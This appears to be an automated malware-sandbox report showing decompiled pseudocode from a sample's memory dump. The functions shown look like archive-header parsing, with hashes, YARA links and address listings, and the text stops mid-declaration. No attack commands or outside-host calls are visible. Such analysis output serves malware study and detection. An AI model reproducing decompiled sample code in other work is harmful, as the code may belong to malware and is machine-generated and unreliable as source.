                            • Opcode Fuzzy Hash: 2dac9ad90cc18d9c953dcdd524bfd01a5e3761cf46bba15c46620e6a42f165e3
                            • Instruction Fuzzy Hash: 7AB1D4719042589BEB26DFA4DC41BEEB7B8FF48300F0045A9FA15E7282D774AE45CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E30FC, Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 605COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 84%
                            			E009E30FC(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t378;
				void* _t380;
				void* _t381;
				void* _t392;
				intOrPtr* _t394;
				intOrPtr* _t396;
				signed int _t409;
				signed int _t419;
				char _t431;
				signed int _t432;
				signed int _t437;
				signed int _t441;
				intOrPtr _t449;
				unsigned int _t455;
				unsigned int _t458;
				signed int _t462;
				signed int _t470;
				signed int _t479;
				signed int _t484;
				signed int _t498;
				intOrPtr _t499;
				signed int _t500;
				signed char _t501;
				unsigned int _t502;
				void* _t509;
				void* _t517;
				signed int _t520;
				void* _t521;
				signed int _t531;
				unsigned int _t534;
				void* _t539;
				intOrPtr _t543;
				void* _t544;
				void* _t545;
				void* _t546;
				intOrPtr _t556;

				_t396 = __ecx;
				_t546 = _t545 - 0x68;
				E009FD870(E00A111A9, _t544);
				E009FD940();
				_t394 = _t396;
				E009EC223(_t544 + 0x30, _t394);
				 *(_t544 + 0x60) = 0;
				 *((intOrPtr*)(_t544 - 4)) = 0;
				if( *((intOrPtr*)(_t394 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t544 + 0x6a)) = 0;
					L16:
					if(E009EC42E(_t498, 7) >= 7) {
						 *(_t394 + 0x21f4) = 0;
						_t509 = _t394 + 0x21e4;
						 *_t509 = E009EC29E(_t544 + 0x30);
						_t531 = E009EC40A(_t544 + 0x30, 4);
						_t242 = E009EC39E(_t498);
						__eflags = _t242 | _t498;
						if((_t242 | _t498) == 0) {
							L85:
							E009E1EF8(_t394);
							L86:
							E009E159C(_t544 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t544 - 0xc));
							return  *(_t544 + 0x60);
						}
						__eflags = _t531;
						if(_t531 == 0) {
							goto L85;
						}
						_t42 = _t531 - 3; // -3
						_t534 = _t531 + 4 + _t242;
						_t409 = _t42 + _t242;
						__eflags = _t409;
						 *(_t544 + 0x64) = _t534;
						if(_t409 < 0) {
							goto L85;
						}
						__eflags = _t534 - 7;
						if(_t534 < 7) {
							goto L85;
						}
						E009EC42E(_t498, _t409);
						__eflags =  *(_t544 + 0x48) - _t534;
						if( *(_t544 + 0x48) < _t534) {
							goto L17;
						}
						_t248 = E009EC37E(_t544 + 0x30);
						 *(_t394 + 0x21e8) = E009EC39E(_t498);
						_t250 = E009EC39E(_t498);
						 *(_t394 + 0x21ec) = _t250;
						__eflags =  *_t509 - _t248;
						 *(_t394 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t394 + 0x21f0) =  *(_t544 + 0x64);
						_t254 =  *(_t394 + 0x21e8);
						 *(_t394 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t509 != _t248;
						 *(_t544 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t394 + 0x21ec) & 0x00000001;
							 *(_t544 + 0x58) = 0;
							 *(_t544 + 0x54) = 0;
							if(( *(_t394 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t394 + 0x21ec) & 0x00000002;
								_t536 = _t256;
								 *(_t544 + 0x64) = _t256;
								 *(_t544 + 0x5c) = _t256;
								if(( *(_t394 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E009EC39E(_t498);
									_t536 = _t362;
									 *(_t544 + 0x64) = _t362;
									 *(_t544 + 0x5c) = _t498;
								}
								_t257 = E009E1901(_t394,  *(_t394 + 0x21f0));
								_t499 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t394 + 0x6ca8)) = E009E3CA7( *((intOrPtr*)(_t394 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t394 + 0x6ca4)), _t536,  *(_t544 + 0x5c), _t499, _t499);
								 *((intOrPtr*)(_t394 + 0x6cac)) = _t499;
								_t500 =  *(_t394 + 0x21e8);
								__eflags = _t500 - 1;
								if(__eflags == 0) {
									E009EA96C(_t394 + 0x2208);
									_t419 = 5;
									memcpy(_t394 + 0x2208, _t509, _t419 << 2);
									_t501 = E009EC39E(_t500);
									 *(_t394 + 0x6cb5) = _t501 & 1;
									 *(_t394 + 0x6cb4) = _t501 >> 0x00000002 & 1;
									 *(_t394 + 0x6cb7) = _t501 >> 0x00000004 & 1;
									_t431 = 1;
									 *((char*)(_t394 + 0x6cba)) = 1;
									 *(_t394 + 0x6cbb) = _t501 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t394 + 0x6cb8)) = 0;
									__eflags = _t501 & 0x00000002;
									if((_t501 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t394 + 0x6cd8)) = E009EC39E(_t501);
										_t270 = 0;
										_t431 = 1;
									}
									__eflags =  *(_t394 + 0x6cb5);
									if( *(_t394 + 0x6cb5) == 0) {
										L81:
										_t431 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t394 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t394 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t394 + 0x6cb9)) = _t431;
											_t432 =  *(_t544 + 0x58);
											__eflags = _t432 |  *(_t544 + 0x54);
											if((_t432 |  *(_t544 + 0x54)) != 0) {
												E009E200C(_t394, _t544 + 0x30, _t432, _t394 + 0x2208);
											}
											L84:
											 *(_t544 + 0x60) =  *(_t544 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t500 - 3;
								if(_t500 <= 3) {
									__eflags = _t500 - 2;
									_t120 = (0 | _t500 != 0x00000002) - 1; // -1
									_t517 = (_t120 & 0xffffdcb0) + 0x45d0 + _t394;
									 *(_t544 + 0x2c) = _t517;
									E009EA8D2(_t517, 0);
									_t437 = 5;
									memcpy(_t517, _t394 + 0x21e4, _t437 << 2);
									_t539 =  *(_t544 + 0x2c);
									 *(_t544 + 0x60) =  *(_t394 + 0x21e8);
									 *(_t539 + 0x1058) =  *(_t544 + 0x64);
									 *((char*)(_t539 + 0x10f9)) = 1;
									 *(_t539 + 0x105c) =  *(_t544 + 0x5c);
									 *(_t539 + 0x1094) = E009EC39E(_t500);
									 *(_t539 + 0x1060) = E009EC39E(_t500);
									_t289 =  *(_t539 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t539 + 0x1064) = _t500;
									 *(_t539 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t539 + 0x1060) = 0x7fffffff;
										 *(_t539 + 0x1064) = 0x7fffffff;
									}
									_t441 =  *(_t539 + 0x105c);
									_t520 =  *(_t539 + 0x1064);
									_t290 =  *(_t539 + 0x1058);
									_t502 =  *(_t539 + 0x1060);
									__eflags = _t441 - _t520;
									if(__eflags < 0) {
										L51:
										_t290 = _t502;
										_t441 = _t520;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t539 + 0x106c) = _t441;
											 *(_t539 + 0x1068) = _t290;
											_t291 = E009EC39E(_t502);
											__eflags =  *(_t539 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t539 + 0x24)) = _t291;
											if(( *(_t539 + 0x1094) & 0x00000002) != 0) {
												E009F0A25(_t539 + 0x1040, _t502, E009EC29E(_t544 + 0x30), 0);
											}
											 *(_t539 + 0x1070) =  *(_t539 + 0x1070) & 0x00000000;
											__eflags =  *(_t539 + 0x1094) & 0x00000004;
											if(( *(_t539 + 0x1094) & 0x00000004) != 0) {
												 *(_t539 + 0x1070) = 2;
												 *((intOrPtr*)(_t539 + 0x1074)) = E009EC29E(_t544 + 0x30);
											}
											 *(_t539 + 0x1100) =  *(_t539 + 0x1100) & 0x00000000;
											_t292 = E009EC39E(_t502);
											 *(_t544 + 0x64) = _t292;
											 *(_t539 + 0x20) = _t292 >> 0x00000007 & 0x00000007;
											_t449 = (_t292 & 0x0000003f) + 0x32;
											 *((intOrPtr*)(_t539 + 0x1c)) = _t449;
											__eflags = _t449 - 0x32;
											if(_t449 != 0x32) {
												 *((intOrPtr*)(_t539 + 0x1c)) = 0x270f;
											}
											 *((char*)(_t539 + 0x18)) = E009EC39E(_t502);
											_t521 = E009EC39E(_t502);
											 *(_t539 + 0x10fc) = 2;
											_t295 =  *((intOrPtr*)(_t539 + 0x18));
											 *(_t539 + 0x10f8) =  *(_t394 + 0x21ec) >> 0x00000006 & 1;
											__eflags = _t295 - 1;
											if(_t295 != 1) {
												__eflags = _t295;
												if(_t295 == 0) {
													_t177 = _t539 + 0x10fc;
													 *_t177 =  *(_t539 + 0x10fc) & 0x00000000;
													__eflags =  *_t177;
												}
											} else {
												 *(_t539 + 0x10fc) = 1;
											}
											_t455 =  *(_t539 + 8);
											 *(_t539 + 0x1098) = _t455 >> 0x00000003 & 1;
											 *(_t539 + 0x10fa) = _t455 >> 0x00000005 & 1;
											__eflags =  *(_t544 + 0x60) - 2;
											_t458 =  *(_t544 + 0x64);
											 *(_t539 + 0x1099) = _t455 >> 0x00000004 & 1;
											if( *(_t544 + 0x60) != 2) {
												L65:
												_t302 = 0;
												__eflags = 0;
												goto L66;
											} else {
												__eflags = _t458 & 0x00000040;
												if((_t458 & 0x00000040) == 0) {
													goto L65;
												}
												_t302 = 1;
												L66:
												 *((char*)(_t539 + 0x10f0)) = _t302;
												_t304 =  *(_t539 + 0x1094) & 1;
												 *(_t539 + 0x10f1) = _t304;
												asm("sbb eax, eax");
												 *(_t539 + 0x10f4) =  !( ~(_t304 & 0x000000ff)) & 0x00020000 << (_t458 >> 0x0000000a & 0x0000000f);
												asm("sbb eax, eax");
												 *(_t539 + 0x109c) =  ~( *(_t539 + 0x109b) & 0x000000ff) & 0x00000005;
												__eflags = _t521 - 0x1fff;
												if(_t521 >= 0x1fff) {
													_t521 = 0x1fff;
												}
												E009EC300(_t544 + 0x30, _t544 - 0x2074, _t521);
												 *((char*)(_t544 + _t521 - 0x2074)) = 0;
												_push(0x800);
												_t522 = _t539 + 0x28;
												_push(_t539 + 0x28);
												_push(_t544 - 0x2074);
												E009F1094();
												_t462 =  *(_t544 + 0x58);
												__eflags = _t462 |  *(_t544 + 0x54);
												if((_t462 |  *(_t544 + 0x54)) != 0) {
													E009E200C(_t394, _t544 + 0x30, _t462, _t539);
												}
												_t319 =  *(_t544 + 0x60);
												__eflags =  *(_t544 + 0x60) - 2;
												if( *(_t544 + 0x60) != 2) {
													L72:
													_t320 = E00A02B69(_t319, _t522, L"CMT");
													__eflags = _t320;
													if(_t320 == 0) {
														 *((char*)(_t394 + 0x6cb6)) = 1;
													}
													goto L74;
												} else {
													E009E1F3D(_t394, _t539);
													_t319 =  *(_t544 + 0x60);
													__eflags =  *(_t544 + 0x60) - 2;
													if( *(_t544 + 0x60) == 2) {
														L74:
														__eflags =  *(_t544 + 0x6b);
														if(__eflags != 0) {
															E009E6BF5(__eflags, 0x1c, _t394 + 0x1e, _t522);
														}
														goto L84;
													}
													goto L72;
												}
											}
										}
										__eflags = _t290 - _t502;
										if(_t290 > _t502) {
											goto L52;
										}
										goto L51;
									}
								}
								__eflags = _t500 - 4;
								if(_t500 == 4) {
									_t470 = 5;
									memcpy(_t394 + 0x2248, _t394 + 0x21e4, _t470 << 2);
									_t331 = E009EC39E(_t500);
									__eflags = _t331;
									if(_t331 == 0) {
										 *(_t394 + 0x225c) = E009EC39E(_t500) & 0x00000001;
										_t335 = E009EC251(_t544 + 0x30) & 0x000000ff;
										 *(_t394 + 0x2260) = _t335;
										__eflags = _t335 - 0x18;
										if(_t335 <= 0x18) {
											E009EC300(_t544 + 0x30, _t394 + 0x2264, 0x10);
											__eflags =  *(_t394 + 0x225c);
											if( *(_t394 + 0x225c) != 0) {
												E009EC300(_t544 + 0x30, _t394 + 0x2274, 8);
												E009EC300(_t544 + 0x30, _t544 + 0x64, 4);
												E009EF524(_t544 - 0x74);
												E009EF56A(_t544 - 0x74, _t394 + 0x2274, 8);
												_push(_t544 + 8);
												E009EF435(_t544 - 0x74);
												_t350 = E009FF3CA(_t544 + 0x64, _t544 + 8, 4);
												asm("sbb al, al");
												_t352 =  ~_t350 + 1;
												__eflags = _t352;
												 *(_t394 + 0x225c) = _t352;
											}
											 *((char*)(_t394 + 0x6cbc)) = 1;
											goto L84;
										}
										_push(_t335);
										_push(L"hc%u");
										L40:
										_push(0x14);
										_push(_t544);
										E009E3E41();
										E009E3DEC(_t394, _t394 + 0x1e, _t544);
										goto L86;
									}
									_push(_t331);
									_push(L"h%u");
									goto L40;
								}
								__eflags = _t500 - 5;
								if(_t500 == 5) {
									_t479 = _t500;
									memcpy(_t394 + 0x4590, _t394 + 0x21e4, _t479 << 2);
									 *(_t394 + 0x45ac) = E009EC39E(_t500) & 0x00000001;
									 *((short*)(_t394 + 0x45ae)) = 0;
									 *((char*)(_t394 + 0x45ad)) = 0;
								}
								goto L84;
							}
							_t484 = E009EC39E(_t498);
							 *(_t544 + 0x54) = _t498;
							_t256 = 0;
							 *(_t544 + 0x58) = _t484;
							__eflags = _t498;
							if(__eflags < 0) {
								goto L30;
							}
							if(__eflags > 0) {
								goto L85;
							}
							__eflags = _t484 -  *(_t394 + 0x21f0);
							if(_t484 >=  *(_t394 + 0x21f0)) {
								goto L85;
							}
							goto L30;
						}
						E009E1EF8(_t394);
						 *((char*)(_t394 + 0x6cc4)) = 1;
						E009E6E03(0xa200e0, 3);
						__eflags =  *((char*)(_t544 + 0x6a));
						if(__eflags == 0) {
							goto L26;
						} else {
							E009E6BF5(__eflags, 4, _t394 + 0x1e, _t394 + 0x1e);
							 *((char*)(_t394 + 0x6cc5)) = 1;
							goto L86;
						}
					}
					L17:
					E009E3DAB(_t394, _t498);
					goto L86;
				}
				_t498 =  *((intOrPtr*)(_t394 + 0x6cc0)) + 8;
				asm("adc eax, ecx");
				_t556 =  *((intOrPtr*)(_t394 + 0x6ca4));
				if(_t556 < 0 || _t556 <= 0 &&  *((intOrPtr*)(_t394 + 0x6ca0)) <= _t498) {
					goto L15;
				} else {
					_push(0x10);
					_push(_t544 + 0x18);
					 *((char*)(_t544 + 0x6a)) = 1;
					if( *((intOrPtr*)( *_t394 + 0xc))() != 0x10) {
						goto L17;
					}
					if( *((char*)( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5124)) != 0) {
						L7:
						 *(_t544 + 0x6b) = 1;
						L8:
						E009E3C40(_t394);
						_t529 = _t394 + 0x2264;
						_t543 = _t394 + 0x1024;
						E009E607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t394 + 0x2264, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
						if( *(_t394 + 0x225c) == 0) {
							L13:
							 *((intOrPtr*)(_t544 + 0x50)) = _t543;
							goto L16;
						} else {
							_t378 = _t394 + 0x2274;
							while(1) {
								_t380 = E009FF3CA(_t544 + 0x28, _t378, 8);
								_t546 = _t546 + 0xc;
								if(_t380 == 0) {
									goto L13;
								}
								_t563 =  *(_t544 + 0x6b);
								_t381 = _t394 + 0x1e;
								_push(_t381);
								_push(_t381);
								if( *(_t544 + 0x6b) != 0) {
									_push(6);
									E009E6BF5(__eflags);
									 *((char*)(_t394 + 0x6cc5)) = 1;
									E009E6E03(0xa200e0, 0xb);
									goto L86;
								}
								_push(0x7d);
								E009E6BF5(_t563);
								E009EE797( *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024);
								E009E3C40(_t394);
								E009E607D(_t543, 0, 5,  *((intOrPtr*)(_t394 + 0x21bc)) + 0x5024, _t529, _t544 + 0x18,  *(_t394 + 0x2260), 0, _t544 + 0x28);
								_t378 = _t394 + 0x2274;
								if( *(_t394 + 0x225c) != 0) {
									continue;
								}
								goto L13;
							}
							goto L13;
						}
					}
					_t392 = E009F0FBA();
					 *(_t544 + 0x6b) = 0;
					if(_t392 == 0) {
						goto L8;
					}
					goto L7;
				}
			}





























































                            0x009e30fc
                            0x009e30fd
                            0x009e3105
                            0x009e310f
                            0x009e3116
                            0x009e311d
                            0x009e3124
                            0x009e3127
                            0x009e3130
                            0x009e3279
                            0x009e3279
                            0x009e327c
                            0x009e3289
                            0x009e329a
                            0x009e32a1
                            0x009e32b1
                            0x009e32bb
                            0x009e32bd
                            0x009e32c4
                            0x009e32c6
                            0x009e38f6
                            0x009e38f8
                            0x009e38fd
                            0x009e3900
                            0x009e390e
                            0x009e3919
                            0x009e3919
                            0x009e32cc
                            0x009e32ce
                            0x00000000
                            0x00000000
                            0x009e32d4
                            0x009e32da
                            0x009e32dc
                            0x009e32dc
                            0x009e32de
                            0x009e32e1
                            0x00000000
                            0x00000000
                            0x009e32e7
                            0x009e32ea
                            0x00000000
                            0x00000000
                            0x009e32f4
                            0x009e32f9
                            0x009e32fc
                            0x00000000
                            0x00000000
                            0x009e3301
                            0x009e3313
                            0x009e3319
                            0x009e331e
                            0x009e3329
                            0x009e332b
                            0x009e3334
                            0x009e333a
                            0x009e3340
                            0x009e3346
                            0x009e3349
                            0x009e334c
                            0x009e334e
                            0x009e3388
                            0x009e3388
                            0x009e338a
                            0x009e3391
                            0x009e3394
                            0x009e3397
                            0x009e33c1
                            0x009e33c1
                            0x009e33c8
                            0x009e33ca
                            0x009e33cd
                            0x009e33d0
                            0x009e33d5
                            0x009e33da
                            0x009e33dc
                            0x009e33df
                            0x009e33df
                            0x009e33ea
                            0x009e33f7
                            0x009e3406
                            0x009e340f
                            0x009e3417
                            0x009e341e
                            0x009e3424
                            0x009e3426
                            0x009e3837
                            0x009e3846
                            0x009e3847
                            0x009e3851
                            0x009e385a
                            0x009e3867
                            0x009e3876
                            0x009e3881
                            0x009e3884
                            0x009e388a
                            0x009e3890
                            0x009e3892
                            0x009e3898
                            0x009e389b
                            0x009e38b2
                            0x009e389d
                            0x009e38a5
                            0x009e38ad
                            0x009e38af
                            0x009e38af
                            0x009e38b8
                            0x009e38bf
                            0x009e38c9
                            0x009e38c9
                            0x00000000
                            0x009e38c1
                            0x009e38c1
                            0x009e38c7
                            0x009e38cb
                            0x009e38cb
                            0x009e38d1
                            0x009e38d6
                            0x009e38d9
                            0x009e38e9
                            0x009e38e9
                            0x009e38ee
                            0x009e38f1
                            0x00000000
                            0x009e38f1
                            0x00000000
                            0x009e38c7
                            0x009e38bf
                            0x009e342c
                            0x00000000
                            0x00000000
                            0x009e3432
                            0x009e3435
                            0x009e3577
                            0x009e357f
                            0x009e358e
                            0x009e3592
                            0x009e3595
                            0x009e359c
                            0x009e35a3
                            0x009e35ae
                            0x009e35b1
                            0x009e35b7
                            0x009e35c0
                            0x009e35c7
                            0x009e35d5
                            0x009e35e0
                            0x009e35ef
                            0x009e35ef
                            0x009e35f1
                            0x009e35f7
                            0x009e35fd
                            0x009e3604
                            0x009e360a
                            0x009e360a
                            0x009e3610
                            0x009e3616
                            0x009e361c
                            0x009e3622
                            0x009e3628
                            0x009e362a
                            0x009e3632
                            0x009e3632
                            0x009e3634
                            0x00000000
                            0x009e362c
                            0x009e362c
                            0x009e3636
                            0x009e3636
                            0x009e363f
                            0x009e3645
                            0x009e364a
                            0x009e3651
                            0x009e3654
                            0x009e3667
                            0x009e3667
                            0x009e366c
                            0x009e3673
                            0x009e367a
                            0x009e367f
                            0x009e368e
                            0x009e368e
                            0x009e3694
                            0x009e369e
                            0x009e36a5
                            0x009e36ae
                            0x009e36b6
                            0x009e36b9
                            0x009e36bc
                            0x009e36bf
                            0x009e36c1
                            0x009e36c1
                            0x009e36d3
                            0x009e36e7
                            0x009e36e9
                            0x009e36f3
                            0x009e36f8
                            0x009e36fe
                            0x009e3700
                            0x009e370a
                            0x009e370c
                            0x009e370e
                            0x009e370e
                            0x009e370e
                            0x009e370e
                            0x009e3702
                            0x009e3702
                            0x009e3702
                            0x009e3715
                            0x009e371f
                            0x009e3731
                            0x009e3737
                            0x009e373b
                            0x009e373e
                            0x009e3744
                            0x009e374f
                            0x009e374f
                            0x009e374f
                            0x00000000
                            0x009e3746
                            0x009e3746
                            0x009e3749
                            0x00000000
                            0x00000000
                            0x009e374b
                            0x009e3751
                            0x009e3751
                            0x009e375d
                            0x009e3762
                            0x009e3777
                            0x009e377d
                            0x009e378c
                            0x009e3791
                            0x009e379c
                            0x009e379e
                            0x009e37a0
                            0x009e37a0
                            0x009e37ad
                            0x009e37b2
                            0x009e37c0
                            0x009e37c5
                            0x009e37c8
                            0x009e37c9
                            0x009e37ca
                            0x009e37cf
                            0x009e37d4
                            0x009e37d7
                            0x009e37e1
                            0x009e37e1
                            0x009e37e6
                            0x009e37e9
                            0x009e37ec
                            0x009e37fe
                            0x009e3804
                            0x009e380b
                            0x009e380d
                            0x009e380f
                            0x009e380f
                            0x00000000
                            0x009e37ee
                            0x009e37f1
                            0x009e37f6
                            0x009e37f9
                            0x009e37fc
                            0x009e3816
                            0x009e3816
                            0x009e381a
                            0x009e3827
                            0x009e3827
                            0x00000000
                            0x009e381a
                            0x00000000
                            0x009e37fc
                            0x009e37ec
                            0x009e3744
                            0x009e362e
                            0x009e3630
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e3630
                            0x009e362a
                            0x009e343b
                            0x009e343e
                            0x009e347f
                            0x009e348c
                            0x009e3491
                            0x009e3496
                            0x009e3498
                            0x009e34cf
                            0x009e34da
                            0x009e34dd
                            0x009e34e3
                            0x009e34e6
                            0x009e34fc
                            0x009e3501
                            0x009e3508
                            0x009e3516
                            0x009e3524
                            0x009e352d
                            0x009e3539
                            0x009e3541
                            0x009e3546
                            0x009e3555
                            0x009e355f
                            0x009e3561
                            0x009e3561
                            0x009e3563
                            0x009e3563
                            0x009e3569
                            0x00000000
                            0x009e3569
                            0x009e34e8
                            0x009e34e9
                            0x009e34a0
                            0x009e34a3
                            0x009e34a5
                            0x009e34a6
                            0x009e34b8
                            0x00000000
                            0x009e34b8
                            0x009e349a
                            0x009e349b
                            0x00000000
                            0x009e349b
                            0x009e3440
                            0x009e3443
                            0x009e344a
                            0x009e3457
                            0x009e3463
                            0x009e346b
                            0x009e3472
                            0x009e3472
                            0x00000000
                            0x009e3443
                            0x009e33a1
                            0x009e33a3
                            0x009e33a6
                            0x009e33a8
                            0x009e33ab
                            0x009e33ad
                            0x00000000
                            0x00000000
                            0x009e33af
                            0x00000000
                            0x00000000
                            0x009e33b5
                            0x009e33bb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e33bb
                            0x009e3352
                            0x009e335e
                            0x009e3365
                            0x009e336a
                            0x009e336e
                            0x00000000
                            0x009e3370
                            0x009e3377
                            0x009e337c
                            0x00000000
                            0x009e337c
                            0x009e336e
                            0x009e328b
                            0x009e328d
                            0x00000000
                            0x009e328d
                            0x009e313e
                            0x009e3141
                            0x009e3143
                            0x009e3149
                            0x00000000
                            0x009e315d
                            0x009e3162
                            0x009e3164
                            0x009e3167
                            0x009e3171
                            0x00000000
                            0x00000000
                            0x009e3184
                            0x009e3193
                            0x009e3193
                            0x009e3197
                            0x009e3199
                            0x009e31b5
                            0x009e31c1
                            0x009e31cd
                            0x009e31d9
                            0x009e3255
                            0x009e3255
                            0x00000000
                            0x009e31db
                            0x009e31db
                            0x009e31e1
                            0x009e31e8
                            0x009e31ed
                            0x009e31f2
                            0x00000000
                            0x00000000
                            0x009e31f4
                            0x009e31f8
                            0x009e31fb
                            0x009e31fc
                            0x009e31fd
                            0x009e325a
                            0x009e325c
                            0x009e3268
                            0x009e326f
                            0x00000000
                            0x009e326f
                            0x009e31ff
                            0x009e3201
                            0x009e3212
                            0x009e3219
                            0x009e3241
                            0x009e324d
                            0x009e3253
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e3253
                            0x00000000
                            0x009e31e1
                            0x009e31d9
                            0x009e3186
                            0x009e318b
                            0x009e3191
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009e3191

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: H_prolog_memcmp
                            • String ID: CMT$h%u$hc%u
                            • API String ID: 3004599000-3282847064
                            • Opcode ID: 30103895bd3d12b2804cb40cababbe99e9748645d0406a2194ca58b9776d06cb
                            • Instruction ID: 1ab02da4eb1512c942acea5c4a70fcb9672edf96e07b02714cc2042b65301d0a
                            • Opcode Fuzzy Hash: 30103895bd3d12b2804cb40cababbe99e9748645d0406a2194ca58b9776d06cb
                            • Instruction Fuzzy Hash: 0732B3715142C49FDF16DF75C89ABEA37A5AF54300F04847AFD8A8B286DB30AD49CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0C55E, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 68%
                            			E00A0C55E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t777;
				signed int _t778;
				signed int _t784;
				signed int _t790;
				intOrPtr _t792;
				void* _t793;
				signed int _t794;
				signed int _t795;
				signed int _t796;
				signed int _t805;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t825;
				signed int _t826;
				signed int _t832;
				signed int _t833;
				signed int _t836;
				signed int _t841;
				signed int _t849;
				signed int* _t852;
				signed int _t856;
				signed int _t867;
				signed int _t868;
				signed int _t870;
				char* _t871;
				signed int _t874;
				signed int _t878;
				signed int _t879;
				signed int _t884;
				signed int _t886;
				signed int _t891;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t913;
				signed int _t926;
				signed int _t927;
				signed int _t929;
				char* _t930;
				signed int _t933;
				signed int _t937;
				signed int _t938;
				signed int* _t940;
				signed int _t943;
				signed int _t945;
				signed int _t950;
				signed int _t958;
				signed int _t961;
				signed int _t965;
				signed int* _t972;
				intOrPtr _t974;
				void* _t975;
				intOrPtr* _t977;
				signed int* _t981;
				unsigned int _t992;
				signed int _t993;
				void* _t996;
				signed int _t997;
				void* _t999;
				signed int _t1000;
				signed int _t1001;
				signed int _t1002;
				signed int _t1012;
				signed int _t1017;
				signed int _t1020;
				unsigned int _t1023;
				signed int _t1024;
				void* _t1027;
				signed int _t1028;
				void* _t1030;
				signed int _t1031;
				signed int _t1032;
				signed int _t1033;
				signed int _t1038;
				signed int* _t1043;
				signed int _t1045;
				signed int _t1055;
				void _t1058;
				signed int _t1061;
				void* _t1064;
				void* _t1071;
				signed int _t1077;
				signed int _t1078;
				signed int _t1081;
				signed int _t1082;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1090;
				signed int _t1094;
				signed int _t1095;
				signed int _t1096;
				signed int _t1098;
				signed int _t1099;
				signed int _t1100;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1105;
				signed int _t1106;
				signed int _t1107;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				unsigned int _t1111;
				void* _t1114;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int* _t1123;
				void* _t1127;
				void* _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1134;
				signed int _t1135;
				signed int _t1140;
				void* _t1142;
				signed int _t1143;
				signed int _t1146;
				char _t1151;
				signed int _t1153;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1157;
